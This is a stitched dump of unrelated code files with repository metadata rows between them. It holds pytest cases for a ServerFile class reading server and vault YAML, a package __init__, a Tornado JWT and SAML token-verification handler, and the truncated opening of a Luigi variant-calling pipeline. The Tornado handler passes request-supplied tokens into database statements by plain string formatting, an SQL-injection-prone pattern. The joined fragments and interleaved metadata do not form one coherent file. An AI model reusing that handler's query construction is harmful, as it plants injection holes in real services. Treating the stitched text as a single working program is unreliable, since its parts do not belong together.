dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; existing server nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
),
None, None, True
),
(
"One server group with one server; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp1',
exp_server_attrs=None,
),
(KeyError, "Server with nickname 'grp1' not found"),
None, True
),
(
"One server with vault file, server exists in vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n".format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=None,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
secrets={'foo': 'bar'}),
),
None, None, True
),
(
"One server with vault file, server does not exist in vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n".format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv2:\n"
" foo: bar\n",
vault_password=None,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
secrets=None),
),
None, None, True
),
(
"One server with encrypted vault file",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="vault_file: {vfn}\n"
"servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n".format(vfn=TEST_VAULT_FILENAME),
vault_filename=TEST_VAULT_FILENAME,
vault_yaml="secrets:\n"
" srv1:\n"
" foo: bar\n",
vault_password=TEST_VAULT_PASSWORD,
nick='srv1',
exp_server_attrs=dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
secrets={'foo': 'bar'}),
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_GET_SERVER)
@simplified_test_function
def test_ServerFile_get_server(
testcase, server_filename, server_yaml, vault_filename, vault_yaml,
vault_password, nick, exp_server_attrs):
"""
Test function for ServerFile.get_server()
"""
with easy_server_file(
server_filename, server_yaml, vault_filename, vault_yaml,
vault_password) as server_filepath:
esf = ServerFile(server_filepath, vault_password, use_keyring=False,
use_prompting=False)
# The code to be tested
act_srv = esf.get_server(nick)
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
for name in exp_server_attrs:
assert getattr(act_srv, name) == exp_server_attrs[name]
TESTCASES_SF_LIST_SERVERS = [
# Testcases for ServerFile.list_servers()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * nick: nickname input parameter for list_servers().
# * exp_servers_attrs: List of dicts with expected attributes of
# Server objects in the result of list_servers().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_servers_attrs=None,
),
(KeyError, "Server or server group with nickname 'srv' not found"),
None, True
),
(
"One server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_servers_attrs=None,
),
(KeyError, "Server or server group with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; non-existing nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv',
exp_servers_attrs=None,
),
(KeyError, "Server or server group with nickname 'srv' not found"),
None, True
),
(
"One server group with one server; existing server nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='srv1',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp1',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with two servers; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp1',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep; existing group nickname",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp2',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep; existing group nickname and "
"multiple group memberships",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
nick='grp2',
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_LIST_SERVERS)
@simplified_test_function
def test_ServerFile_list_servers(
testcase, server_filename, server_yaml, vault_filename, vault_yaml,
vault_password, nick, exp_servers_attrs):
"""
Test function for ServerFile.list_servers()
"""
with easy_server_file(
server_filename, server_yaml, vault_filename, vault_yaml,
vault_password) as server_filepath:
esf = ServerFile(server_filepath, vault_password, use_keyring=False,
use_prompting=False)
# The code to be tested
act_sds = esf.list_servers(nick)
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
assert len(exp_servers_attrs) == len(act_sds)
sorted_exp_servers_attrs = sorted(
exp_servers_attrs, key=lambda x: x['nickname'])
sorted_act_sds = sorted(act_sds, key=lambda x: x.nickname)
for i, exp_server_attrs in enumerate(sorted_exp_servers_attrs):
act_sd = sorted_act_sds[i]
for name in exp_server_attrs:
assert getattr(act_sd, name) == exp_server_attrs[name]
TESTCASES_SF_LIST_DEFAULT_SERVERS = [
# Testcases for ServerFile.list_default_servers()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * exp_servers_attrs: List of dicts with expected attributes of
# Server objects in the result of list_default_servers().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers, no default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[],
),
None, None, True
),
(
"One server; no default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[],
),
None, None, True
),
(
"One server; with default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"default: srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server; server is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
"default: srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server; group is default",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
"default: grp1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_LIST_DEFAULT_SERVERS)
@simplified_test_function
def test_ServerFile_list_default_servers(
testcase, server_filename, server_yaml, vault_filename, vault_yaml,
vault_password, exp_servers_attrs):
"""
Test function for ServerFile.list_default_servers()
"""
with easy_server_file(
server_filename, server_yaml, vault_filename, vault_yaml,
vault_password) as server_filepath:
esf = ServerFile(server_filepath, vault_password, use_keyring=False,
use_prompting=False)
# The code to be tested
act_sds = esf.list_default_servers()
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
assert len(exp_servers_attrs) == len(act_sds)
sorted_exp_servers_attrs = sorted(
exp_servers_attrs, key=lambda x: x['nickname'])
sorted_act_sds = sorted(act_sds, key=lambda x: x.nickname)
for i, exp_server_attrs in enumerate(sorted_exp_servers_attrs):
act_sd = sorted_act_sds[i]
for name in exp_server_attrs:
assert getattr(act_sd, name) == exp_server_attrs[name]
TESTCASES_SF_LIST_ALL_SERVERS = [
# Testcases for ServerFile.list_all_servers()
# Each list item is a testcase tuple with these items:
# * desc: Short testcase description.
# * kwargs: Keyword arguments for the test function:
# * server_filename: Filename of server file to be created.
# * server_yaml: Content of server file.
# * vault_filename: Filename of vault file to be created, or None.
# * vault_yaml: Content of vault file, or None.
# * vault_password: Password for encryption of vault file, or None.
# * exp_servers_attrs: List of dicts with expected attributes of
# Server objects in the result of list_all_servers().
# * exp_exc_types: Expected exception type(s), or None.
# * exp_warn_types: Expected warning type(s), or None.
# * condition: Boolean condition for testcase to run, or 'pdb' for debugger
(
"No servers",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers: {}\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[],
),
None, None, True
),
(
"One server",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with one server",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
],
),
None, None, True
),
(
"One server group with two servers",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep with two servers total",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
(
"Nested server groups 2 levels deep with two servers total and "
"multiple group memberships",
dict(
server_filename=TEST_SERVER_FILENAME,
server_yaml="servers:\n"
" srv1:\n"
" description: server1\n"
" user_defined:\n"
" stuff: 42\n"
" srv2:\n"
" description: server2\n"
" user_defined:\n"
" stuff: 43\n"
"server_groups:\n"
" grp1:\n"
" description: group1\n"
" members:\n"
" - srv1\n"
" grp2:\n"
" description: group2\n"
" members:\n"
" - grp1\n"
" - srv1\n"
" - srv2\n",
vault_filename=None,
vault_yaml=None,
vault_password=None,
exp_servers_attrs=[
dict(
nickname='srv1',
description='server1',
contact_name=None,
access_via=None,
user_defined={'stuff': 42},
),
dict(
nickname='srv2',
description='server2',
contact_name=None,
access_via=None,
user_defined={'stuff': 43},
),
],
),
None, None, True
),
]
@pytest.mark.parametrize(
"desc, kwargs, exp_exc_types, exp_warn_types, condition",
TESTCASES_SF_LIST_ALL_SERVERS)
@simplified_test_function
def test_ServerFile_list_all_servers(
testcase, server_filename, server_yaml, vault_filename, vault_yaml,
vault_password, exp_servers_attrs):
"""
Test function for ServerFile.list_all_servers()
"""
with easy_server_file(
server_filename, server_yaml, vault_filename, vault_yaml,
vault_password) as server_filepath:
esf = ServerFile(server_filepath, vault_password, use_keyring=False,
use_prompting=False)
# The code to be tested
act_sds = esf.list_all_servers()
# Ensure that exceptions raised in the remainder of this function
# are not mistaken as expected exceptions
assert testcase.exp_exc_types is None, \
"Expected exception not raised: {}". \
format(testcase.exp_exc_types)
assert len(exp_servers_attrs) == len(act_sds)
sorted_exp_servers_attrs = sorted(
exp_servers_attrs, key=lambda x: x['nickname'])
sorted_act_sds = sorted(act_sds, key=lambda x: x.nickname)
for i, exp_server_attrs in enumerate(sorted_exp_servers_attrs):
act_sd = sorted_act_sds[i]
for name in exp_server_attrs:
assert getattr(act_sd, name) == exp_server_attrs[name]
| 34.922525
| 80
| 0.483478
| 6,698
| 73,023
| 5.034189
| 0.043744
| 0.060352
| 0.0484
| 0.054094
| 0.900353
| 0.881758
| 0.865862
| 0.858804
| 0.84703
| 0.837273
| 0
| 0.010609
| 0.429467
| 73,023
| 2,090
| 81
| 34.939234
| 0.798737
| 0.10194
| 0
| 0.832606
| 0
| 0.000545
| 0.225226
| 0.004317
| 0
| 0
| 0
| 0
| 0.009815
| 1
| 0.003817
| false
| 0.045802
| 0.003817
| 0
| 0.007634
| 0.000545
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e759e111e8532250379574aaf174bb9a6a570515
| 296
|
py
|
Python
|
concrete_settings/contrib/sources/__init__.py
|
coordt/concrete-settings
|
b444c3f1f8cdbe30135c1978876215e04ebc7622
|
[
"MIT"
] | 5
|
2020-04-25T12:18:33.000Z
|
2021-03-26T18:51:33.000Z
|
concrete_settings/contrib/sources/__init__.py
|
coordt/concrete-settings
|
b444c3f1f8cdbe30135c1978876215e04ebc7622
|
[
"MIT"
] | 13
|
2019-03-20T10:42:39.000Z
|
2021-07-07T08:01:05.000Z
|
concrete_settings/contrib/sources/__init__.py
|
coordt/concrete-settings
|
b444c3f1f8cdbe30135c1978876215e04ebc7622
|
[
"MIT"
] | 3
|
2020-04-25T08:53:29.000Z
|
2021-07-06T19:15:52.000Z
|
from .yaml_source import YamlSource # noqa: F401 # imported but unused
from .json_source import JsonSource # noqa: F401 # imported but unused
from .envvar_source import EnvVarSource # noqa: F401 # imported but unused
from .python_source import PythonSource # noqa: F401 # imported but unused
| 59.2
| 75
| 0.783784
| 40
| 296
| 5.7
| 0.4
| 0.210526
| 0.280702
| 0.333333
| 0.491228
| 0.381579
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 0.162162
| 296
| 4
| 76
| 74
| 0.870968
| 0.429054
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e7abac1d75645cd7f4f620f9728743a448e6b6a9
| 7,369
|
py
|
Python
|
modules/jwtoken/handlers/verify.py
|
francoricci/spspid
|
db335f2335824ba4f7aa7a01cd15c235bc815a47
|
[
"MIT"
] | 2
|
2017-09-18T07:03:14.000Z
|
2021-09-28T07:58:58.000Z
|
modules/jwtoken/handlers/verify.py
|
francoricci/spspid
|
db335f2335824ba4f7aa7a01cd15c235bc815a47
|
[
"MIT"
] | 1
|
2021-09-28T08:04:05.000Z
|
2021-09-28T08:04:05.000Z
|
modules/jwtoken/handlers/verify.py
|
francoricci/sapspid
|
db335f2335824ba4f7aa7a01cd15c235bc815a47
|
[
"MIT"
] | null | null | null |
from response import ResponseObj
from request import RequestObjNew
import tornado.web
import tornado.gen
import tornado.ioloop
import tornado.concurrent
import logging
import commonlib
from jwtoken.handlers.jwtokenhandler import jwtokenHandler
import asyncio
import globalsObj
class verifyHandler(jwtokenHandler):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
#get
async def get(self):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_default_headers()
response_obj = await self.verify()
asyncio.ensure_future(self.writeLog(response_obj), loop = globalsObj.ioloop)
self.writeResponse(response_obj)
#post
async def post(self):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_default_headers()
response_obj = await self.verify()
asyncio.ensure_future(self.writeLog(response_obj), loop = globalsObj.ioloop)
self.writeResponse(response_obj)
@commonlib.inner_log
async def verify(self):
try:
if self.request.method == 'GET':
token = super(self.__class__, self).get_argument('token')
elif self.request.method == 'POST':
# leggi il json della richiesta
temp = RequestObjNew(self.request.body)
if temp.error["code"] == 2:
response_obj = ResponseObj(debugMessage=temp.error["message"], httpcode=400)
response_obj.setError('400')
logging.getLogger(type(self).__module__+"."+type(self).__qualname__).error('Validation error. Json input error')
return response_obj
elif temp.error["code"] > 0:
raise tornado.web.HTTPError(httpcode=503, log_message=temp.error["message"])
token = temp.request['token']
verifica = await self.dbobjJwt.execute_statment("verify_token('%s')" % token)
if verifica['error'] == 0:
if verifica['result'][0]['verify_token_bycod'] == None:
response_obj = ResponseObj(httpcode=404)
response_obj.setError('jwtoken101')
elif verifica['result'][0]['verify_token_bycod']['error'] == 0:
response_obj = ResponseObj(httpcode=200)
response_obj.setError('200')
response_obj.setResult(jose = verifica['result'][0]['verify_token_bycod']['message'])
elif verifica['result'][0]['verify_token_bycod']['error'] > 0:
response_obj = ResponseObj(httpcode=401, devMessage=(verifica['result'][0]['verify_token_bycod']['message']))
response_obj.setError('jwtoken100')
elif verifica['error'] > 0:
response_obj = ResponseObj(debugMessage=verifica['result'], httpcode=500)
response_obj.setError('jwtoken105')
except tornado.web.MissingArgumentError as error:
response_obj = ResponseObj(debugMessage=error.log_message, httpcode=error.status_code,
devMessage=error.log_message)
response_obj.setError(str(error.status_code))
logging.getLogger(type(self).__module__+"."+type(self).__qualname__).error('%s'% error,exc_info=True)
except Exception as inst:
response_obj = ResponseObj(httpcode=500)
response_obj.setError('500')
logging.getLogger(type(self).__module__+"."+type(self).__qualname__).error('Exception',exc_info=True)
if self.request.method == 'POST':
response_obj.setID(temp.id)
return response_obj
class verifySamlHandler(jwtokenHandler):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
#get
async def get(self):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_default_headers()
response_obj = await self.verify()
asyncio.ensure_future(self.writeLog(response_obj), loop = globalsObj.ioloop)
self.writeResponse(response_obj)
#post
async def post(self):
self.set_header('Content-Type', 'application/json; charset=UTF-8')
self.set_default_headers()
response_obj = await self.verify()
asyncio.ensure_future(self.writeLog(response_obj), loop = globalsObj.ioloop)
self.writeResponse(response_obj)
@commonlib.inner_log
async def verify(self):
try:
if self.request.method == 'GET':
token = super(self.__class__, self).get_argument('token')
elif self.request.method == 'POST':
# leggi il json della richiesta
temp = RequestObjNew(self.request.body)
if temp.error["code"] == 2:
response_obj = ResponseObj(debugMessage=temp.error["message"], httpcode=400)
response_obj.setError('400')
logging.getLogger(type(self).__module__+"."+type(self).__qualname__).error('Validation error. Json input error')
return response_obj
elif temp.error["code"] > 0:
raise tornado.web.HTTPError(httpcode=503, log_message=temp.error["message"])
token = temp.request['token']
verifica = await self.dbobjJwt.execute_statment("verify_saml_bytoken('%s')" % token)
if verifica['error'] == 0:
if verifica['result'][0]['verify_saml_by_cod_token'] == None:
response_obj = ResponseObj(httpcode=404)
response_obj.setError('jwtoken101')
elif verifica['result'][0]['verify_saml_by_cod_token']['error'] == 0:
response_obj = ResponseObj(httpcode=200)
response_obj.setError('200')
response_obj.setResult(jose = verifica['result'][0]['verify_saml_by_cod_token']['message'],
saml_attributes = verifica['result'][0]['verify_saml_by_cod_token']['saml_attributes'])
elif verifica['result'][0]['verify_saml_by_cod_token']['error'] > 0:
response_obj = ResponseObj(httpcode=401, devMessage=(verifica['result'][0]['verify_saml_by_cod_token']['message']))
response_obj.setError('jwtoken100')
elif verifica['error'] > 0:
response_obj = ResponseObj(debugMessage=verifica['result'], httpcode=500)
response_obj.setError('jwtoken105')
except tornado.web.MissingArgumentError as error:
response_obj = ResponseObj(debugMessage=error.log_message, httpcode=error.status_code,
devMessage=error.log_message)
response_obj.setError(str(error.status_code))
logging.getLogger(type(self).__module__+"."+type(self).__qualname__).error('%s'% error,exc_info=True)
except Exception as inst:
response_obj = ResponseObj(httpcode=500)
response_obj.setError('500')
logging.getLogger(type(self).__module__+"."+type(self).__qualname__).error('Exception',exc_info=True)
if self.request.method == 'POST':
response_obj.setID(temp.id)
return response_obj
| 42.350575
| 135
| 0.61433
| 781
| 7,369
| 5.546735
| 0.148528
| 0.121884
| 0.071099
| 0.053324
| 0.924515
| 0.924515
| 0.922207
| 0.915974
| 0.904663
| 0.896584
| 0
| 0.019398
| 0.265436
| 7,369
| 173
| 136
| 42.595376
| 0.780898
| 0.010042
| 0
| 0.793651
| 0
| 0
| 0.119358
| 0.023186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0
| 0.087302
| 0
| 0.150794
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7b2e99747ee5a74ff3df1cb19b37a26e4a7fd5a
| 34,707
|
py
|
Python
|
code/variant_calling.py
|
pierson-we/wes_pipe
|
f24c3d2541def30b3c7ff86995c227330c4c6e15
|
[
"MIT"
] | null | null | null |
code/variant_calling.py
|
pierson-we/wes_pipe
|
f24c3d2541def30b3c7ff86995c227330c4c6e15
|
[
"MIT"
] | null | null | null |
code/variant_calling.py
|
pierson-we/wes_pipe
|
f24c3d2541def30b3c7ff86995c227330c4c6e15
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import subprocess
import luigi
import luigi.interface
import os
import sys
import time
import random
import pipeline_utils
import global_vars
import bam_processing
import misc_utils
class mutect_single_normal(luigi.Task):
max_threads = luigi.IntParameter()
project_dir = luigi.Parameter()
sample = luigi.Parameter()
fastq_file = luigi.Parameter()
# tumor = luigi.Parameter()
# matched_n = luigi.Parameter()
# vcf_path = luigi.Parameter()
# case_dict = luigi.DictParameter()
cfg = luigi.DictParameter()
def requires(self):
# if self.matched_n != '':
# return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads)]
# else:
return bam_processing.index_bam(sample=self.sample, fastq_file=self.fastq_file, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
def output(self):
return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'mutect', self.sample + '.vcf.gz')), luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'mutect', self.sample + '.vcf.gz.tbi'))]
def run(self):
for output in self.output():
pipeline_utils.confirm_path(output.path)
# if self.matched_n:
